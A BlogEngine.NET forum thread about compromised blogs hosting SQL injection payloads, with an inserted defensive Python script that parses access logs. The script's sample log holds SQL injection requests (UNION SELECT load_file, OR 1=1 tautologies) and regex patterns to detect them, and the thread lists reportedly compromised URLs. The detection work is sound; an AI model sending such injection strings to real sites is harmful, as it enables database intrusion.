Major security issue with old version

Topics: ASP.NET 2.0
Sep 15, 2015 at 5:40 PM
I'm getting multiple hits of SQL injection attempts that use "infected" (very appropriately) BlogEngine.NET sites to host infectious payloads for other forums (a phpBB3 attack in my case).

All the payloads have in common that they are hosted on compromised BlogEngine.NET URLs.

Examples:
http://sunilrav.com/template/page/pictures-of-hiv-and-aids.aspx (2.7.0.0)
http://www.megaedd.com/kataleptic/page/aidshiv-facts.aspx (2.5.0.6)
http://blog.gildedvillage.com/template/page/chlamydia-symptoms-in-women.aspx (2.5.0.6)

Now if you google blogengine.net, the first website found is even flagged by Google as "probably infected":

BlogEngine.NET | An open source ASP.NET 4.0 powered ...
www.dotnetblogengine.net/
This site may be hacked.
An open source ASP.NET 4.0 powered blogging engine.
Features - BlogEngine.NET 3.0 Is Here - BlogEngine.NET 2.9 Released - Contact

Maybe you should contact ISPs and hosting companies to ask them to turn off hacked versions of the blog engine worldwide?
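The observation above (injection attempts whose payload is fetched from a URL on a compromised third-party blog) is the kind of thing a forum operator can pull out of an access log automatically. The script below is an added example and not part of the original post or of BlogEngine.NET or phpBB: it parses Apache combined-format log lines, URL-decodes the request target, flags requests carrying common SQL injection markers, and extracts any embedded URL so the hosting domains can be listed for an abuse report. The log lines, IPs and hostnames (`.invalid` TLD) are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlparse

# Constructed sample access log (Apache combined format). IPs are from the
# documentation ranges and hostnames use the reserved .invalid TLD; none are real.
SAMPLE_LOG = """\
203.0.113.10 - - [15/Sep/2015:17:40:01 +0000] "GET /viewtopic.php?f=1&t=2%20UNION%20SELECT%20load_file(%27http://example-compromised-blog.invalid/template/page/some-post.aspx%27)-- HTTP/1.1" 403 512 "-" "Mozilla/5.0"
203.0.113.10 - - [15/Sep/2015:17:40:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Sep/2015:17:41:15 +0000] "GET /ucp.php?mode=login%27%20OR%201%3D1;%20--%20http%3A%2F%2Fanother-blog.invalid%2Fkataleptic%2Fpage%2Fother.aspx HTTP/1.1" 200 2048 "-" "curl/7.43"
192.0.2.5 - - [15/Sep/2015:17:42:00 +0000] "GET /viewtopic.php?t=5 HTTP/1.1" 200 1500 "http://search.invalid/" "Mozilla/5.0"
"""

# Combined-format prefix: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# A small set of injection markers; a production rule set would be larger,
# but these cover the UNION / load_file / tautology / comment-terminator cases.
SQLI_RE = re.compile(
    r"(union\s+select|load_file\s*\(|'\s*or\s+\d+\s*=\s*\d+|;\s*--)",
    re.IGNORECASE,
)

# Any absolute URL embedded in the decoded request (stops at quotes/parens/space).
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def extract_payload_hosts(log_text: str) -> list:
    """Return one record per request that carries SQLi markers and an embedded URL.

    Each record holds the attacking source IP, the timestamp, the full payload
    URL and the host serving it (the domain to notify).
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Decode once so encoded quotes/spaces (%27, %20, +) become visible to the rules.
        decoded = unquote_plus(m.group("target"))
        if not SQLI_RE.search(decoded):
            continue
        for url in URL_RE.findall(decoded):
            host = urlparse(url).hostname
            if host:
                findings.append({
                    "source_ip": m.group("ip"),
                    "timestamp": m.group("ts"),
                    "payload_url": url,
                    "payload_host": host,
                })
    return findings


def summarize_by_host(findings: list) -> dict:
    """Count distinct attacking IPs per payload-hosting domain, for an abuse report."""
    ips_by_host = {}
    for f in findings:
        ips_by_host.setdefault(f["payload_host"], set()).add(f["source_ip"])
    return {host: len(ips) for host, ips in ips_by_host.items()}


if __name__ == "__main__":
    hits = extract_payload_hosts(SAMPLE_LOG)
    for h in hits:
        print(f'{h["timestamp"]}  {h["source_ip"]}  ->  {h["payload_url"]}')
    print("hosts to report:", summarize_by_host(hits))
```

On the constructed sample this yields two flagged requests and two hosting domains, each seen from one source IP. The referer on the last line is deliberately not treated as a payload, since only URLs inside the injected request target are of interest; the output of `summarize_by_host` is what you would send to the hosting provider of each domain.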
Coordinator
Sep 15, 2015 at 7:42 PM
The "dotnetblogengine" site will be replaced soon; unfortunately we don't own it and are limited in what we can do.
Security patches are issued regularly, but we can't force anyone to patch. It's the same as for any web software: we are regularly hit from the mentioned phpBB sites as well as WordPress, along with all kinds of unidentified "scripts". Obviously, anything we can do on our side short of a worldwide internet shutdown is and will be done.
Nov 13, 2015 at 10:39 PM
Edited Nov 13, 2015 at 10:48 PM
My site was a victim of the injection attack, twice now. Current version: BlogEngine.NET 2.0.0.36.

I am a new resource to this project, without access to the previous developer. Where can I obtain patches that may address this?

Thank you in advance.

PS: Not necessarily looking to upgrade the Blog to the latest version.
Coordinator
Nov 15, 2015 at 5:52 AM
Security patches are issued regularly; if you don't want to upgrade, you would need to manually examine all of those issued after your version and apply them to your code where applicable.
You can search for patches on project site: http://dotnetblogengine.net/search.aspx?q=security%20patch
Nov 16, 2015 at 4:38 PM
Edited Nov 16, 2015 at 4:42 PM
Many thanks. We are looking to patch it up and eventually upgrade to the latest version. Developer referrals are welcome!